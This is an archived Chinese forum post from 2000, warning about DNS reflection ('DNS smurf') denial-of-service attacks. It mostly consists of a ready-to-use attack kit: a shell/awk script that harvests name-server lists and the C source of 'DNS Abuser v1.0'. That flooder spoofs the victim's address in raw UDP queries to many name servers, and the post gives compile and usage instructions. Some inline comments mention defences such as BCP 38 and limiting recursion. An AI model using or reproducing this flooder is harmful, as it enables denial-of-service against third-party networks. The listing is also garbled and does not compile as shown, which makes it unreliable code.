<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center">               ● UNIX网络编程                       (BM: clown)                </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p   align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="309.htm">上一层</a>][<a href="347.htm">下一篇</a>]
<hr><p align="left"><small>发信人: Sargent (剑心), 信区: Security <br>

标  题: 警惕新的D.o.S方法 <br>

发信站: 武汉白云黄鹤站 (Fri Oct  6 02:50:19 2000), 站内信件 <br>

  <br>

  <br>

警惕新的D.o.S方法 2000-08-04 10:12 <br>

发布者:netbull 阅读次数:89 <br>

一种针对DNS服务器链的缺陷的报文放大技术可以使一个主机的带宽消耗殆尽。对于域名 <br>

服务器接收和转发外部DNS查询的功能,实际上存在先天缺陷,攻击者可以设法扩大请求 <br>

通信量,利用它来执行类似于 "smurf attack"的攻击,这种攻击对网络也能造成消耗大 <br>

量带宽的后果。我们把这种攻击称为 "DNS smurf"。这些DNS服务器一般是接受外部查询 <br>

请求的域名服务器,特别是那些转发查询或者重试次数过多的域名服务器(正常值为3次 <br>

,但一些服务器设置为超过20次)。 <br>

  假设一个DNS查询在第一台DNS服务器上找不到记录,那么这台DNS服务器会把域名查 <br>

询转发给其它的DNS服务器。假设在一段区域内的DNS链中包含有多台DNS服务器,而且该 <br>

区域权威的DNS服务器也找不到能解析该域名的记录的话,那么这多台服务器都会向外面 <br>

发请求,这样请求报文的数量就会被放大若干倍。这种放大技术可以用来实现D.O.S(Denial <br>

Of Service)攻击,而且很有效。 <br>

下面的程序把源地址伪造成目标主机的UDP查询包发送给列表中的各台名字服务器,这些服务器的应答因此都会发往目标主机. <br>

  查询的部分列表已经包含在这个源程序当中.可以自己定义查询列表以获得最大查询 <br>

率(目前为20-25)运行该程序有一个小小的延迟,因为必须通过名字服务器解析IP.然后就 <br>

会以全速发送UDP查询到自定义的名字服务器列表中的每一台服务器.名字服务器的名字 <br>

格式为每行一个. <br>



当下载了inaddr.zone.gz文件后,可以利用下面脚本快速建立一名字服务器列表. <br>

----------------------------------------------------- <br>

#!/bin/sh <br>

# print_ns: print a random sample of name-server host names found in NS records of $ZONE. <br>

# $1 is the approximate number of names wanted; each line matching /NS/ is kept with probability $1 / (line count of $ZONE). <br>

# Names are collected as keys of the awk array "serv", so a server listed in several records is printed once. <br>

# NOTE(review): the awk program below has no surrounding quotes or line continuation in this copy - presumably lost when the post was converted to HTML. <br>

# For operators: a server that appears in public zone data and answers recursive queries from outside its own network can be used as a reflector, so that is the setting to audit. <br>

ZONE=inaddr.zone; <br>

if [ "x$1x" == "xx" ]; then <br>

echo "Usage: print_ns aprox_nr_of_servers"; <br>

exit <br>

fi <br>

if [ ! -f $ZONE ]; then <br>

echo "Zone file $ZONE not found"; <br>

exit <br>

fi <br>

NR=`wc -l $ZONE`; <br>

awk --assign=TOT="$NR" --assign=DES="$1" <br>

BEGIN { srand(); th=DES/TOT; }; <br>

/NS/ { if( rand() < th ) <br>

{ <br>

fi = split( $0, entry ); <br>

if( entry[fi-1] == "NS" ) <br>

serv[entry[fi]] = 1; <br>

}}; <br>

END { for( ns in serv ) <br>



printf "%s\n", ns; <br>

} $ZONE <br>

---------------------------------------------------- <br>

这种 DoS攻击比流行的smurf攻击有以下优势. <br>

1,可以列出25000或者更多的名字服务器入列表. <br>

2,几乎可以通过所有的防火墙系统.因为采用UDP查询,很难制定相应的过滤规则. <br>

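3,因为每一台机器都需要一个名字解析服务器.唯一的解决办法就是拒绝所有的UDP数据 <br>

包从端口53流入,除了来自本地内部的机器.(小心别毁了自己用的名字服务器.) <br>

补充:对名字服务器的管理员来说,应只向本网客户端提供递归查询,并对应答做速率限制; <br>

在网络出口按BCP 38(RFC 2827)丢弃源地址不属于本网的报文,可以从源头阻止这类伪造查询. <br>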

用法在linux下编译,gcc -o dnsa1 dnsa1.c <br>

运行格式:dnsa1 目标主机 0 [dns_server列表文件.txt [dns_query列表文件.txt]] <br>

攻击程序如下: <br>

/* <br>

* DNS Abuser v1.0 <br>

* Working version by Zelea <br>

* Last modified: 26 February 2000 <br>

* <br>

* Based on dnsabuser.c by Nemo (cveira@airtel.net) and <br>

* on DOOMDNS by FuSyS <br>

* <br>

* Usage: dnsa1 target times [dns_server.txt [dns_query.txt]] <br>

* times = 0 表示一直连续攻击 <br>

*/ <br>

*/ <br>

/* This program is for educational purpose only */ <br>

#include stdio.h <br>

#include string.h <br>

#include unistd.h <br>

#include stdlib.h <br>

#include sys/types.h <br>

#include sys/socket.h <br>

#include arpa/inet.h <br>

#include arpa/nameser.h <br>

#include netinet/in.h <br>

#include netinet/ip.h <br>

#include netinet/udp.h <br>

#include netdb.h <br>

#include time.h <br>

// Byte lengths of an option-less IPv4 header and of a UDP header; doomzone() adds them to the DNS message length. <br>

#define IP_HEAD_BASE 20 <br>

#define UDP_HEAD_BASE 8 <br>

// Size of the question buffer in struct DNS_MSG and of the payload buffer in struct dns_pkt. <br>

#define DNS_QSIZE 64 <br>

// Size of the line buffer main() uses when reading the two list files. <br>

#define MAX_LINE 255 <br>

#define MAX_QUERYS 255 // maximum buffer size <br>

#define MAX_SERVERS 255 // maximum buffer size <br>

#define QUERY_LENGTH 32 // max QUERY length <br>

#define DEF_DOMAINS "./dns_server.txt" // name servers <br>



#define DEF_QUERYS "./dns_query.txt" // query list file <br>

// DNS message as built in doomzone(): a HEADER followed by the encoded question. <br>

// NOTE(review): HEADER is not declared in this listing; presumably it comes from arpa/nameser.h - confirm. <br>

struct DNS_MSG <br>

{ <br>

HEADER head; <br>

char query[DNS_QSIZE]; <br>

}; <br>

// Complete datagram handed to the raw socket: IPv4 header, UDP header, then the DNS message bytes. <br>

struct dns_pkt <br>

{ <br>

struct iphdr ip; <br>

struct udphdr udp; <br>

char data[DNS_QSIZE]; <br>

}; <br>

// Query names used at run time; filled by main() from the query file or from dns_query_def. <br>

char dns_query[MAX_QUERYS][QUERY_LENGTH]; <br>

// Built-in query names used when no query file could be opened; the list ends with NULL. <br>

char *dns_query_def[] = <br>

{ "ca", "de", "es", "ch", "be", "ie", "cr", "org", "com", "edu", <br>

"gov", "net", "se", "gr", "ro", "fr", "it", "ru", "pl", "ma", <br>

"in", "fi", "nrc.ca", "pse.pl", "arpa", "ucd.ie", "nl", "sk", <br>

"at", "psi.net", "uqam.ca", "ac.cy", "cz", "sh", "nu", <br>

"gmx.net", "ac.in", "usc.edu", "ac.uk", NULL }; <br>

// Addresses of the name servers that receive the queries; main() ends the list with a 0 entry. <br>

unsigned long dns_servers[MAX_SERVERS]; <br>

// Address written into the source field of every IP header. main() sets it from argv[1] (the target), <br>

// so it is not the sender's own address: this is the spoofing that source-address filtering (BCP 38) is meant to stop. <br>

unsigned long saddr; <br>

// Raw socket descriptor shared by main() and doomzone(). The declaration appears twice in this copy of the listing. <br>

int sd; // <br>

int sd; // <br>

// Turn a dotted-quad string or a host name into an IPv4 address. <br>

// name: text to resolve. It is first tried as a literal with inet_addr(), then looked up with gethostbyname(). <br>

// Returns the value of addr.sin_addr.s_addr widened to unsigned long, or (unsigned long)-1 after printing a message when the lookup fails. <br>

// NOTE(review): inet_addr() failure is detected by comparing with -1, so the literal "255.255.255.255" is also sent to gethostbyname(). <br>

unsigned long <br>

nameResolve( const char *name ) <br>

{ <br>

struct hostent *host; <br>

struct sockaddr_in addr; <br>

memset( &addr, 0, sizeof( struct sockaddr_in ) ); <br>

addr.sin_family = AF_INET; <br>

addr.sin_addr.s_addr = inet_addr( name ); <br>

if ( addr.sin_addr.s_addr == -1 ) <br>

{ <br>

// Not a usable literal: fall back to a resolver lookup. <br>

if ( ( host = gethostbyname( name ) ) == NULL ) <br>

{ <br>

fprintf( stderr, "Unable to resolve host %s\n", name ); <br>

return ( -1 ); <br>

} <br>

addr.sin_family = host->h_addrtype; <br>

// NOTE(review): h_length bytes are copied into sin_addr without comparing h_length with sizeof addr.sin_addr. <br>

memcpy( ( caddr_t ) & addr.sin_addr, host->h_addr, host->h_length ); <br>

} <br>

return ( unsigned long ) addr.sin_addr.s_addr; <br>

} <br>

// Build one DNS query datagram by hand and send it through the raw socket sd. <br>

// The IP source field is the global saddr (set from the command-line target in main()), the destination is the <br>

// next entry of dns_servers, so any answer goes to saddr and not to the machine running this code. <br>

// What a sensor sees for each datagram, as set below: UDP to port 53, source port in 1024..3023, RD=1, <br>

// one question of type ANY / class IN, IP TTL 64, the UDP checksum field left at 0 (never assigned after the memset), <br>

// and a DNS ID equal to the sender's process id - the same value in every datagram of a run, stored without htons(). <br>

// Source-address validation at the sender's network edge drops such datagrams, and a name server that refuses <br>

// recursion for clients outside its own network does not resolve them. <br>

// NOTE(review): several character literals are missing in this copy (the bare "\" and "." below); the listing does not compile as shown. <br>

void <br>

doomzone( void ) <br>



{ <br>

// Positions in dns_servers and dns_query; static, so successive calls walk both lists round-robin. <br>

static int nsptr = 0; <br>

static int qptr = 0; <br>

unsigned long daddr; <br>

unsigned short psrc, pdest; <br>

struct sockaddr_in sin; <br>

struct dns_pkt dpk; <br>

struct DNS_MSG killer; <br>

int shoot, len; <br>

char *p, *plgt; <br>

// A 0 entry marks the end of the server list: wrap to the first server. <br>

if ( dns_servers[nsptr] == 0L ) <br>

nsptr = 0; <br>

daddr = dns_servers[nsptr++]; <br>

// Same wrap-around for the query names; the value compared against is lost in this copy. <br>

if ( *dns_query[qptr] == \ ) <br>

qptr = 0; <br>

psrc = htons( 1024 + ( rand( ) % 2000 ) ); <br>

pdest = htons( 53 ); <br>

// build packets ... <br>

memset( &killer, 0, sizeof( killer ) ); <br>

killer.head.id = getpid( ); <br>

killer.head.rd = 1; <br>

killer.head.aa = 0; <br>



killer.head.opcode = QUERY; <br>

killer.head.qr = 0; <br>

killer.head.qdcount = htons( 1 ); <br>

killer.head.ancount = htons( 0 ); <br>

killer.head.nscount = htons( 0 ); <br>

killer.head.arcount = htons( 0 ); <br>

// The name is appended after the first byte of the zeroed buffer, leaving room for a leading length byte. <br>

strcat( killer.query + 1, dns_query[qptr++] ); <br>

// Walk the name and overwrite the byte in front of each label with that label's length (p - plgt - 1). <br>

p = plgt = killer.query; <br>

do <br>

{ <br>

p++; <br>

while ( *p != . && *p != \ ) <br>

p++; <br>

*plgt = ( u_char ) ( p - plgt - 1 ); <br>

plgt = p; <br>

} <br>

while ( *p == . ); <br>

p++; <br>

*(( unsigned short * ) p)++ = htons( T_ANY ); /* type ANY */ <br>

*(( unsigned short * ) p)++ = htons( C_IN ); /* class IN */ <br>

// DNS message length: 12 plus the bytes written into query (12 presumably being the size of HEADER - confirm). <br>

len = 12 + p - killer.query; <br>

memset( &dpk, 0, sizeof( dpk ) ); <br>



dpk.udp.source = psrc; <br>

dpk.udp.dest = pdest; <br>

dpk.udp.len = htons( UDP_HEAD_BASE + len ); <br>

memcpy( dpk.data, ( void * ) &killer, len ); <br>

dpk.ip.ihl = 5; <br>

dpk.ip.version = 4; <br>

dpk.ip.tos = 0; <br>

dpk.ip.tot_len = htons( IP_HEAD_BASE + UDP_HEAD_BASE + len ); <br>

dpk.ip.frag_off = 0; <br>

dpk.ip.ttl = 64; <br>

dpk.ip.protocol = IPPROTO_UDP; <br>

// Source address comes from the global set in main(), not from the local interface. <br>

dpk.ip.saddr = saddr; <br>

dpk.ip.daddr = daddr; <br>

memset( &sin, 0, sizeof( sin ) ); <br>

sin.sin_family = AF_INET; <br>

sin.sin_port = pdest; <br>

sin.sin_addr.s_addr = daddr; <br>

shoot = sendto( sd, &dpk, <br>

( IP_HEAD_BASE + UDP_HEAD_BASE + len ), 0, <br>

( struct sockaddr * ) &sin, sizeof( sin ) ); <br>

// A failed send is only reported; the caller is not told. <br>

if ( shoot < 0 ) <br>

fprintf( stderr, "SPOOF ERROR" ); <br>



} <br>

// Program entry: read the target and repeat count from the command line, load the name-server list and the <br>

// query-name list, open a raw socket with IP_HDRINCL, then call doomzone() in a loop. <br>

// argv[1] is resolved into the global saddr, which doomzone() uses as the IP source of every datagram. <br>

// argv[2] is the number of datagrams to send; 0 means the loop never ends. <br>

// Every error path below calls exit( 0 ), so the exit status does not distinguish failure from success. <br>

// NOTE(review): the braces in this copy are unbalanced (an extra closing brace after the query-file block and an <br>

// extra opening brace in the default-query loop), and some character literals are missing; the comments here <br>

// describe the statements that are visible, not a compilable program. <br>

int <br>

main( int argc, char *argv[] ) <br>

{ <br>

FILE *dd, *qd; // file pointers <br>

int i, j, sd_opt; <br>

unsigned int times = 0; <br>

unsigned long ns_addr; <br>

char line[MAX_LINE]; <br>

char *p; <br>

// unbuffered output <br>

setbuf( stdout, NULL ); <br>

setbuf( stderr, NULL ); <br>

// ->simple<- parameter checking :P <br>

if ( argc < 3 ) <br>

{ <br>

fprintf( stderr, "\nUsage:\t%s target times " <br>

"[dns_servers.txt [dns_query.txt]]\n\n", argv[0] ); <br>

exit( 0 ); <br>

} <br>

// The return value of nameResolve() is stored without being checked for the failure value. <br>

saddr = nameResolve( argv[1] ); <br>

times = atoi( argv[2] ); <br>



// loading files <br>

// The default server list is opened first; the blocks below replace dd and set qd when extra arguments are present. <br>

dd = fopen( DEF_DOMAINS, "r" ); <br>

if ( argc > 3 ) <br>

{ <br>

if ( ( dd = fopen( argv[4], "r" ) ) == NULL ) <br>

{ <br>

fprintf( stderr, "\nCannot open domain file %s. Quitting...\n", argv[4] ); <br>

exit( 0 ); <br>

} <br>

} <br>

if ( argc > 4 ) <br>

{ <br>

if ( ( qd = fopen( argv[5], "r" ) ) == NULL ) <br>

{ <br>

fprintf( stderr, "\nCannot open query file %s. Quitting...\n", argv[5] ); <br>

exit( 0 ); <br>

} <br>

} <br>

else <br>

{ <br>

qd = fopen( DEF_QUERYS, "r" ); <br>

} <br>

} <br>

if ( dd == NULL ) <br>

{ <br>

fprintf( stderr, "\nCannot open domain file. Quitting...\n" ); <br>

exit( 0 ); <br>

} <br>

// Read one server name per line, resolve it, and keep the address when resolution succeeds. <br>

// At most MAX_SERVERS - 1 addresses are stored so that the terminating 0 entry always fits. <br>

i = 0; <br>

do <br>

{ <br>

fgets( line, MAX_LINE - 1, dd ); <br>

if ( ( p = strchr( line, \n ) ) != NULL ) <br>

*p = \; <br>

if ( ( ns_addr = nameResolve( line ) ) != -1 ) <br>

dns_servers[i++] = ns_addr; <br>

} <br>

while ( ( i < MAX_SERVERS - 1 ) && !feof( dd ) ); <br>

dns_servers[i] = 0L; <br>

i = 0; <br>

j = 0; <br>

// Without a query file, copy the built-in names that are shorter than QUERY_LENGTH into dns_query. <br>

if ( qd == NULL ) <br>

{ <br>

while ( ( i < MAX_QUERYS - 1 ) && dns_query_def[j] != NULL ) <br>

{ <br>

{ <br>

if ( strlen( dns_query_def[j] ) < QUERY_LENGTH ) <br>

strcpy( dns_query[i++], dns_query_def[j++] ); <br>

else <br>

j++; <br>

} <br>

} <br>

else <br>

{ <br>

// With a query file, take one name per line and skip lines that do not fit in QUERY_LENGTH. <br>

do <br>

{ <br>

fgets( line, MAX_LINE - 1, qd ); <br>

if ( ( p = strchr( line, \n ) ) != NULL ) <br>

*p = \; <br>

if ( strlen( line ) < QUERY_LENGTH ) <br>

strcpy( dns_query[i++], line ); <br>

} <br>

while ( ( i < MAX_QUERYS - 1 ) && !feof( qd ) ); <br>

} <br>

// Mark the end of the query list; doomzone() tests the first byte of an entry to find it. <br>

*dns_query[i] = \; <br>

fclose( dd ); <br>

fclose( qd ); <br>

// opening sockets ... <br>



srand( time( NULL ) ); <br>

sd_opt = 1; <br>

// A raw socket with IP_HDRINCL lets the program supply its own IP header, including the source address. <br>

// On Linux creating it requires root or CAP_NET_RAW, so restricting that privilege limits who can run code like this. <br>

if ( ( sd = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) < 0 ) <br>

{ <br>

fprintf( stderr, "\nSocket error. Quitting...\n" ); <br>

exit( 0 ); <br>

} <br>

if ( setsockopt( sd, IPPROTO_IP, IP_HDRINCL, &sd_opt, <br>

sizeof( sd_opt ) ) < 0 ) <br>

{ <br>

fprintf( stderr, "\nIP Error. Quitting...\n" ); <br>

exit( 0 ); <br>

} <br>

printf( "\n\n\033[1;36mDNS Abuser v1.0\033[0m" ); <br>

printf( "\n\033[1;31mDNS-based flooder\033[0m" ); <br>

// flooding engine <br>

printf( "\n\033[1;32mFlooding %s:\033[0m\n", argv[1] ); <br>

// One doomzone() call per iteration, with no delay between calls; a dot is printed after every 100 calls. <br>

i = 0; <br>

while ( times == 0 || i < times ) <br>

{ <br>

doomzone( ); <br>

i++; <br>



if ( !( i % 100 ) ) <br>

printf( "\033[0;32m.\033[0m" ); <br>

} <br>

printf( "\n\n" ); <br>

return ( 0 ); <br>

} <br>

iamafan@263.net <br>

-- <br>

</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="309.htm">上一层</a>][<a href="347.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>
